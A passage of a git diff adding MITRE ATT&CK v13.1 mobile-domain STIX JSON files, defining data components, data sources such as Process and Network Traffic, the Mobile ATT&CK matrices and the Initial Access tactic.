"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--764ee29e-48d6-4934-8e6b-7a606aaaafc0.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--764ee29e-48d6-4934-8e6b-7a606aaaafc0.json new file mode 100644 index 0000000000000000000000000000000000000000..0cf8a370e792c59840c98f539afa988344baf67d --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--764ee29e-48d6-4934-8e6b-7a606aaaafc0.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--f7176a61-17fe-43e1-b7dd-2a062b8b5630", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-13T19:59:42.141Z", + "name": "Network Communication", + "description": "Network requests made by an application or domains contacted", + "x_mitre_data_source_ref": "x-mitre-data-source--e156f007-c5bf-45cc-8dd5-d442ffb0d203", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--764ee29e-48d6-4934-8e6b-7a606aaaafc0", + "created": "2023-03-13T19:59:42.141Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6.json new file mode 100644 index 0000000000000000000000000000000000000000..56153d709f98c10fb5fbbf44901dbdc4e5d17b66 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6.json @@ -0,0 +1,25 @@ +{ + "type": "bundle", + "id": "bundle--88ea97e1-255d-4229-862a-d92f593a12a0", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-20T20:22:45.613Z", + "name": "Host Status", + "description": "Logging, messaging, and other artifacts highlighting the health of host sensors (ex: metrics, errors, and/or exceptions from logging applications)", + "x_mitre_data_source_ref": "x-mitre-data-source--4523e7f3-8de2-4078-96f8-1227eb537159", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a.json new file mode 100644 index 0000000000000000000000000000000000000000..c098cbde4b434671304a36e1e6e3385973531290 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--70735986-4548-4cb1-9bda-21d93912f89d", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.274Z", + "name": "Network Traffic Flow", + "description": "Summarized network packet data, with metrics, such as protocol headers and volume (ex: Netflow or Zeek http.log)", + "x_mitre_data_source_ref": "x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43.json new file mode 100644 index 0000000000000000000000000000000000000000..6a1e2dd8d78fec646e1c5260f35ed5720a2a97b0 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--b8f0a1a2-b1f2-4ff0-a1ed-b2aafb713385", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-13T20:00:08.487Z", + "name": "Permissions Requests", + "description": "Permissions declared in an application's manifest or property list file", + "x_mitre_data_source_ref": "x-mitre-data-source--e156f007-c5bf-45cc-8dd5-d442ffb0d203", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "created": "2023-03-13T20:00:08.487Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--bf0ff551-a5a7-40e5-bff9-f9405011b1f4.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--bf0ff551-a5a7-40e5-bff9-f9405011b1f4.json new file mode 100644 index 0000000000000000000000000000000000000000..d5d0e9990c99bde7bb8d79be5aee2417006a06cb --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--bf0ff551-a5a7-40e5-bff9-f9405011b1f4.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--d1fa7cb9-a729-40ac-b928-625913f34835", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-13T20:47:52.557Z", + "name": "System Notifications", + "description": "Notifications generated by the OS", + "x_mitre_data_source_ref": "x-mitre-data-source--55ba7d30-887f-42c1-a24e-c4e90aff24b8", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--bf0ff551-a5a7-40e5-bff9-f9405011b1f4", + "created": "2023-03-13T20:47:52.557Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--e2f72131-14d1-411f-8e8c-aa3453dd5456.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--e2f72131-14d1-411f-8e8c-aa3453dd5456.json new file mode 100644 index 0000000000000000000000000000000000000000..7726d9a5436ce0f81277c7cd2207fe581fe0815f --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--e2f72131-14d1-411f-8e8c-aa3453dd5456.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--7120e9bd-cb23-4f48-9d8c-612e9e02c791", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-13T20:47:24.038Z", + "name": "Permissions Request", + "description": "System prompts triggered when an application requests new or additional permissions", + "x_mitre_data_source_ref": "x-mitre-data-source--55ba7d30-887f-42c1-a24e-c4e90aff24b8", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--e2f72131-14d1-411f-8e8c-aa3453dd5456", + "created": "2023-03-13T20:47:24.038Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--ee575f4a-2d4f-48f6-b18b-89067760adc1.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--ee575f4a-2d4f-48f6-b18b-89067760adc1.json new file mode 100644 index 0000000000000000000000000000000000000000..825447db21b3cb6078575a422e33f0d21f1869fb --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-component/x-mitre-data-component--ee575f4a-2d4f-48f6-b18b-89067760adc1.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--0a1effba-3584-4425-86dd-607896b5668e", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--ee575f4a-2d4f-48f6-b18b-89067760adc1", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.272Z", + "name": "Process Metadata", + "description": "Contextual data about a running process, which may include information such as environment variables, image name, user/owner, etc.", + "x_mitre_data_source_ref": "x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-source/x-mitre-data-source--4523e7f3-8de2-4078-96f8-1227eb537159.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-source/x-mitre-data-source--4523e7f3-8de2-4078-96f8-1227eb537159.json new file mode 100644 index 0000000000000000000000000000000000000000..4c29ef93b0e604633c3648642c577b6af2b8cde2 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-source/x-mitre-data-source--4523e7f3-8de2-4078-96f8-1227eb537159.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--70f69f14-8725-4bb8-80e4-fc71bd65f6df", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-20T18:38:40.409Z", + "name": "Sensor Health", + "description": "Information from host telemetry providing insights about system status, errors, or other notable functional activity", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS", + "Android", + "iOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--4523e7f3-8de2-4078-96f8-1227eb537159", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0013", + "external_id": "DS0013" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-source/x-mitre-data-source--55ba7d30-887f-42c1-a24e-c4e90aff24b8.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-source/x-mitre-data-source--55ba7d30-887f-42c1-a24e-c4e90aff24b8.json new file mode 100644 index 0000000000000000000000000000000000000000..7f265ca93810089ae9989d14c5bdd354e73713c4 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-source/x-mitre-data-source--55ba7d30-887f-42c1-a24e-c4e90aff24b8.json @@ -0,0 +1,41 @@ +{ + "type": "bundle", + "id": "bundle--3ecebfce-4aec-4ea6-b060-17661c3a6cc3", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-13T19:36:25.108Z", + "name": "User Interface", + "description": "Visual activity on the device that could alert the user to potentially malicious behavior.", + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_collection_layers": [ + "Device" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--55ba7d30-887f-42c1-a24e-c4e90aff24b8", + "created": "2023-03-13T19:36:25.108Z", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0042", + "external_id": "DS0042" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-source/x-mitre-data-source--73691708-ffb5-4e29-906d-f485f6fa7089.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-source/x-mitre-data-source--73691708-ffb5-4e29-906d-f485f6fa7089.json new file mode 100644 index 0000000000000000000000000000000000000000..39a11ffd1dbed79eb7eacc33e85818dccffa9b49 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-source/x-mitre-data-source--73691708-ffb5-4e29-906d-f485f6fa7089.json @@ -0,0 +1,62 @@ +{ + "type": "bundle", + "id": "bundle--f1bfe9e1-f359-4d38-963a-2adc8db6aec6", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-20T18:38:00.625Z", + "name": "Command", + "description": "A directive given to a computer program, acting as an interpreter of some kind, in order to perform a specific task(Citation: Confluence Linux Command Line)(Citation: Audit OSX)", + "x_mitre_platforms": [ + "Containers", + "Linux", + "Network", + "Windows", + "macOS", + "Android", + "iOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)", + "Austin Clark, @c2defense" + ], + "x_mitre_collection_layers": [ + "Container", + "Host" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--73691708-ffb5-4e29-906d-f485f6fa7089", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0017", + "external_id": "DS0017" + }, + { + "source_name": "Confluence Linux Command Line", + "description": "Confluence Support. (2021, September 8). How to enable command line audit logging in linux. Retrieved September 23, 2021.", + "url": "https://confluence.atlassian.com/confkb/how-to-enable-command-line-audit-logging-in-linux-956166545.html" + }, + { + "source_name": "Audit OSX", + "description": "Gagliardi, R. (n.d.). Audit in a OS X System. Retrieved September 23, 2021.", + "url": "https://www.scip.ch/en/?labs.20150108" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-source/x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-source/x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3.json new file mode 100644 index 0000000000000000000000000000000000000000..346244bcc49f75d08b7d0c6e1a6357cffdef44aa --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-source/x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3.json @@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--d0961e83-23a6-4dad-8404-58121f6ec8c3", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-20T18:38:13.356Z", + "name": "Network Traffic", + "description": "Data transmitted across a network (ex: Web, DNS, Mail, File, etc.), that is either summarized (ex: Netflow) and/or captured as raw data in an analyzable format (ex: PCAP)", + "x_mitre_platforms": [ + "IaaS", + "Linux", + "Windows", + "macOS", + "Android", + "iOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)", + "ExtraHop" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane", + "Host", + "Network" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0029", + "external_id": "DS0029" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-source/x-mitre-data-source--e156f007-c5bf-45cc-8dd5-d442ffb0d203.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-source/x-mitre-data-source--e156f007-c5bf-45cc-8dd5-d442ffb0d203.json new file mode 100644 index 0000000000000000000000000000000000000000..df30d533176b8326b2f3739652d7a2917834e3ab --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-source/x-mitre-data-source--e156f007-c5bf-45cc-8dd5-d442ffb0d203.json @@ -0,0 +1,41 @@ +{ + "type": "bundle", + "id": "bundle--5468b4df-44d1-4b46-8475-04d49be5227f", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-13T19:30:41.131Z", + "name": "Application Vetting", + "description": "Application vetting report generated by an external cloud service.", + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_collection_layers": [ + "Report" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--e156f007-c5bf-45cc-8dd5-d442ffb0d203", + "created": "2023-03-13T19:30:41.131Z", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0041", + "external_id": "DS0041" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-source/x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-source/x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22.json new file mode 100644 index 0000000000000000000000000000000000000000..80e3a04526cbf533794603022b5121c01c404da7 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-data-source/x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22.json @@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--5e7c5799-7e20-4ef2-8eb3-8c613bc21759", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-20T18:38:26.515Z", + "name": "Process", + "description": "Instances of computer programs that are being executed by at least one thread. Processes have memory space for process executables, loaded modules (DLLs or shared libraries), and allocated memory regions containing everything from user input to application-specific data structures(Citation: Microsoft Processes and Threads)", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS", + "Android", + "iOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0009", + "external_id": "DS0009" + }, + { + "source_name": "Microsoft Processes and Threads", + "description": "Microsoft. (2018, May 31). Processes and Threads. Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-matrix/x-mitre-matrix--5104d5f0-16b7-4aec-8ae3-0a90cd5494fc.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-matrix/x-mitre-matrix--5104d5f0-16b7-4aec-8ae3-0a90cd5494fc.json new file mode 100644 index 0000000000000000000000000000000000000000..f4843933859050ec61fc12022dffe17601994d74 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-matrix/x-mitre-matrix--5104d5f0-16b7-4aec-8ae3-0a90cd5494fc.json @@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": "bundle--be196bb6-cf38-4f9d-a5f3-62f4637aa72a", + "spec_version": "2.0", + "objects": [ + { + "tactic_refs": [ + "x-mitre-tactic--9eb4c21e-4fa8-44c9-b167-dbfc455f9210", + "x-mitre-tactic--e78d7d60-41b5-49b7-b0a9-5c5d4cbabe17" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "x-mitre-matrix", + "id": "x-mitre-matrix--5104d5f0-16b7-4aec-8ae3-0a90cd5494fc", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "mobile-attack", + "url": "https://attack.mitre.org/matrices/mobile-attack" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "Below are the tactics and techniques representing the two MITRE ATT&CK Matrices for Mobile. The Matrices cover techniques involving device access and network-based effects that can be used by adversaries without device access. The Matrices contains information for the following platforms: Android, iOS.", + "modified": "2022-04-06T15:44:04.736Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Network-Based Effects", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-matrix/x-mitre-matrix--a382db5e-d009-4135-b893-0e0ff021c95b.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-matrix/x-mitre-matrix--a382db5e-d009-4135-b893-0e0ff021c95b.json new file mode 100644 index 0000000000000000000000000000000000000000..5bb3a5649a43f123dddf0f7df3e1fcac4540980f --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-matrix/x-mitre-matrix--a382db5e-d009-4135-b893-0e0ff021c95b.json @@ -0,0 +1,45 @@ +{ + "type": "bundle", + "id": "bundle--52e0f65f-4996-4c47-bddc-a955e1c146f9", + "spec_version": "2.0", + "objects": [ + { + "tactic_refs": [ + "x-mitre-tactic--0a93fd8e-4a83-4c15-8203-db290e5f2ac6", + "x-mitre-tactic--4a800987-a3a8-4d56-a1bd-0d7171431756", + "x-mitre-tactic--363bbeff-bb2a-4734-ac74-d6d37202fe54", + "x-mitre-tactic--3e962de5-3280-43b7-bc10-334fbc1d6fa8", + "x-mitre-tactic--987cda6d-eb77-406b-bf68-bcb5f3d2e1df", + "x-mitre-tactic--6fcb36b8-3776-483b-8699-42215714fb10", + "x-mitre-tactic--d418cdeb-1b9f-4a6b-a15d-2f89f549f8c1", + "x-mitre-tactic--7be441c2-0095-4b1e-8125-fa8ffda29b0f", + "x-mitre-tactic--7a0d25d3-f0c0-40bf-bf90-c743871b19ba", + "x-mitre-tactic--3f660805-fa2e-42e8-8851-57f9e9b653e3", + "x-mitre-tactic--10fa8d8d-1b04-4176-917e-738724239981", + "x-mitre-tactic--6ebce653-294a-444a-bffb-14c04c8d137e" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "x-mitre-matrix", + "id": "x-mitre-matrix--a382db5e-d009-4135-b893-0e0ff021c95b", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_version": "2.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "mobile-attack", + "url": "https://attack.mitre.org/matrices/mobile-attack" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Below are the tactics and technique representing the MITRE ATT&CK Matrix for Mobile. The Matrix contains information for the following platforms: Android, iOS.", + "modified": "2022-04-06T15:43:22.080Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Mobile ATT&CK", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--0a93fd8e-4a83-4c15-8203-db290e5f2ac6.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--0a93fd8e-4a83-4c15-8203-db290e5f2ac6.json new file mode 100644 index 0000000000000000000000000000000000000000..ee384fbbc1bb3d1b16f12e9042cf7147e7c9d8c6 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--0a93fd8e-4a83-4c15-8203-db290e5f2ac6.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--efaa34ae-128a-4eb3-a11c-11b128e17a15", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--0a93fd8e-4a83-4c15-8203-db290e5f2ac6", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0027", + "url": "https://attack.mitre.org/tactics/TA0027", + "source_name": "mitre-attack" + } + ], + "modified": "2020-01-27T14:02:36.744Z", + "name": "Initial Access", + "description": "The adversary is trying to get into your device.\n\nThe initial access tactic represents the vectors adversaries use to gain an initial foothold onto a mobile device.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "initial-access" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--10fa8d8d-1b04-4176-917e-738724239981.json 